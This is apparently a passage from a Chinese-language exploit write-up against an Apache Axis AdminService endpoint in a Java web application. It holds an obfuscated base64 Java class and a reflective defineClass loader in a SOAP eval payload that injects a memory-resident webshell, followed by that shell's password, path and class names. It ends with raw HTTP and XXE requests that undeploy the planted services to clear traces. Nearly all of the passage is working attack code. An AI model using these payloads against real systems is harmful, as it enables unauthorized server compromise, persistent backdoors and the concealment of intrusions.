SSlWDAE9AT4KAS0BPwEAC3RvQnl0ZUFycmF5AQAEKClbQgwBQQFCCgEtAUMBAANvYmoBAAlmaWVsZE5hbWUBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAARnZXRGAQA/KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DAFJAUoKAAIBSwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkBwFNCgFOANYKAU4AdQEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcBUQEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwBVAFVCgB8AVYBAA1nZXRTdXBlcmNsYXNzDAFYAHgKAHwBWQoBUgAUAQAMdGFyZ2V0T2JqZWN0AQAKbWV0aG9kTmFtZQEAB21ldGhvZHMBABtbTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAKcGFyYW1DbGF6egEAEltMamF2YS9sYW5nL0NsYXNzOwEABXBhcmFtAQAGbWV0aG9kAQAJdGVtcENsYXNzBwFfAQASZ2V0RGVjbGFyZWRNZXRob2RzAQAdKClbTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAWgBaQoAfAFqCgDTAF0BAAZlcXVhbHMMAW0AgQoADwFuAQARZ2V0UGFyYW1ldGVyVHlwZXMBABQoKVtMamF2YS9sYW5nL0NsYXNzOwwBcAFxCgDTAXIKAJwAFAEACmdldE1lc3NhZ2UMAXUABgoAmgF2CgCVABQBAAg8Y2xpbml0PgoAAgApACEAAgAEAAAAAAAOAAEABQAGAAEABwAAABAAAQABAAAABBMACbAAAAAAAAEACgAGAAIACwAAAAQAAQANAAcAAAAXAAMAAQAAAAu7AA9ZEwARtwAVsAAAAAAAAQASABYAAQAHAAAA2AAD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';var bytecode;try{var clsBase64 = classLoader.loadClass('java.util.Base64');var clsDecoder = classLoader.loadClass('java.util.Base64$Decoder');var decoder = clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode = clsDecoder.getMethod('decode', clsString).invoke(decoder, bytecodeBase64);} catch (ee) {try {var datatypeConverterClz = classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode = datatypeConverterClz.getMethod('parseBase64Binary', clsString).invoke(datatypeConverterClz, bytecodeBase64);} catch (eee) {var clazz1 = classLoader.loadClass('sun.misc.BASE64Decoder');bytecode = clazz1.newInstance().decodeBuffer(bytecodeBase64);}}var clsClassLoader = classLoader.loadClass('java.lang.ClassLoader');var clsByteArray = (new java.lang.String('a').getBytes().getClass());var clsInt = java.lang.Integer.TYPE;var defineClass = clsClassLoader.getDeclaredMethod('defineClass', [clsByteArray, clsInt, clsInt]);defineClass.setAccessible(true);var clazz = defineClass.invoke(classLoader,bytecode,new java.lang.Integer(0),new java.lang.Integer(bytecode.length));clazz.newInstance();}
}   test();]]></arg0><arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
</arg1></eval></soapenv:Body></soapenv:Envelope>
1
2
3
4
5
6
7

密码: ndrqjxdtldybh
请求路径: /defaultroot/login.jsp
请求头: User-Agent: Viglqru
脚本类型: JSP
内存马类名: org.apache.commons.lang.ServletContextWbqsbkListener
注入器类名: org.apache.commons.lang.be.CSVUtil
image-20240519135915283

痕迹清理:卸载服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /axis/services/AdminService HTTP/1.1
Host: 192.168.123.136:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 463

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
<undeployment xmlns="http://xml.apache.org/axis/wsdd/">
 <service name="test1Service"/>
</undeployment>
  </soapenv:Body>
</soapenv:Envelope>
1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE aaa [
<!ENTITY name SYSTEM "http://127.0.0.1:7001/defaultroot/services/./AdminService?method=%21--%3E%3Cundeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%0A%20%3Cservice%20name%3D%22giqmdService%22%2F%3E%0A%3C%2Fundeployment" >
]>
<name>&name;</name>
1
2
3
!--><undeployment xmlns="http://xml.apache.org/axis/wsdd/">
 <service name="giqmdService"/>
</undeployment